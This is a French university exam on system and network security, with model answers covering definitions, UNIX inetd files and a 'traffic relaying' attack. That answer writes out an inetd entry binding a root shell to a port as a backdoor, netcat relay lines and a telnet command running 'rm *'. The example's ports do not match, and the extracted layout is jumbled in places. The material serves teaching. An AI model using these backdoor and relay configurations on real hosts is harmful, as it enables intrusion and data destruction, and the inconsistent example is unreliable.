Sécurité des Systèmes et des Réseaux

Page 1 sur 2Lecteur de document UniversityLib

Sécurité des Systèmes et des Réseaux

Cybersecurity · exam

Voir tous les documents en sécurité informatique

DS1_2019_2020

Sécurité des Systèmes et des Réseaux

Le 26 Février 2020 à 21H

1- Donner une définition des éléments suivants : Backdoor, Proxy, Vulnérabilité, Syslog

2- Donner une définition d'une attaque ?

3- A quoi servent les fichiers suivants sous UNIX :

  • /etc/inetd.conf
  • /etc/services

4- Expliquez l'attaque dite traffic relaying ?

5- Expliquez le rôle de la polytique de sécurité dans la sécurité ?

Réponses :

1- Donner une définition des éléments suivants : Backdoor, Proxy, Vulnérabilité, Syslog ?

Backdoor : Un service installé de façon frauduleuse pour être exploité ultérieurement.

Généralement ce service est installé sur un port (/etc/services) non fonctionnel (ports > 1024).

Proxy : C’est un firewall applicatif. Il opère au niveau de la couche 7. Son adresse IP est autorisée

dans la table du firewall.

Publicité

Vulnérabilité : Ce sont les faiblesses intrinsèques d’un système. Elles sont souvent cibles de

l’attaquant pour les exploiter et faire une attaque.

Syslog : C’est le processus responsable d’enregistrer les traces. Sous UNIX il s’appelle

« syslogd ». Il est le seul à enregistrer les log (dans /var).

2- Donner une définition d'une attaque ?

Une attaque est une menace qui exploite une vulnérabilité pour porter atteinte à l’une des

composantes de la sécurité (Confidentialité, Intégrité, Disponibilité) et ce en contournant les

défenses (Firewall, Proxy, IDS, etc.).

3- A quoi servent les fichiers suivants sous UNIX :

  • /etc/inetd.conf
  • /etc/services

c’est le fichier de configuration de inetd. Il contient les services sous le

/etc/inetd.conf

contrôle de inetd comme (telnetd et ftpd). A partir de ce fichier on peut activer ou désactiver ces

services (telnetd, ftpd, etc.) en enlevant ou en rajoutant le caractère « # » au début du services

concerné.

Publicité

Exemple

telnet

Le service « telnetd » est actif et le service « ftpd » est désactivé.

tcp nowait

stream

root /usr/sbin/in.telnetd in.telnetd

ftp stream

tcp nowait

root /usr/sbin/in.ftpd

in.ftpd

/etc/services

port, met un « # » au début de sa ligne.

c’est le fichier de configuration des ports et les protocoles associés. Pour fermer un

4- Expliquez l'attaque dite traffic relaying ?

C’est une attaque qui permet d’atteindre une cible (victime) en passant par deux ou plusieurs

machines intermédiaires. Ainsi l’attaquant ne laisse pas de trace chez la victime.

Publicité

Exemple :

Relay A

Output-to-input

Ecouteur netcat

victime

Client netcat

Hacker

Relay B

Output-to-input

Dans ce cas, le Hacker dans la machine « Client » a installé un backdoor « Ecouteur de typpe sh

« Shell» chez la machine victime. Il a configuré /etc/inetd.conf de deux machines A et B pour que

sa requête envoyée vers A, sera déroutée vers B. La machine B va dérouter à son tour la requête

du hacker ver la machine de la victime. Une configuration possible de A et B dans /etc/inetd.conf

sera la suivante :

Sur la machine A dont l’adresse IP est 192.168.123.27, la configuration de /etc/inetd.conf est :

11111 stream tcp nowait nobody /usr/sbin/tcpd /usr/bin/nc 192.168.123.28 54321

Publicité

Sur la machine B dont l’adresse IP est 192.168.123.28, la configuration de /etc/inetd.conf est :

54321 stream tcp nowait nobody /usr/sbin/tcpd /usr/bin/nc 192.168.123.29 2222

On suppose que la victime dispose de l’adresse IP suivante : « 192.168.123.29 ». La

configuration de /etc/inetd.conf de la machine victime est

12345 stream tcp nowait root /bin/sh sh –i

ET on suppose que le hacker dispose de l’adresse IP suivante : « 192.168.123.26 »

Une opération telnet sur la machine du hacker est envisageable comme suit :

C:\ telnet 192.168.123.27 11111

rm *

^d

5- Expliquez le rôle de la politique de sécurité dans la sécurité ?

Une politique de sécurité c’est l’ensemble des mesures permettant de sécuriser le système. Ces

mesures se traduisent par actions, des directives et des configurations sur les dispositifs (Firewall,

Proxy, etc.). Parmi ces mesures on trouve les règles dans la table du firewall.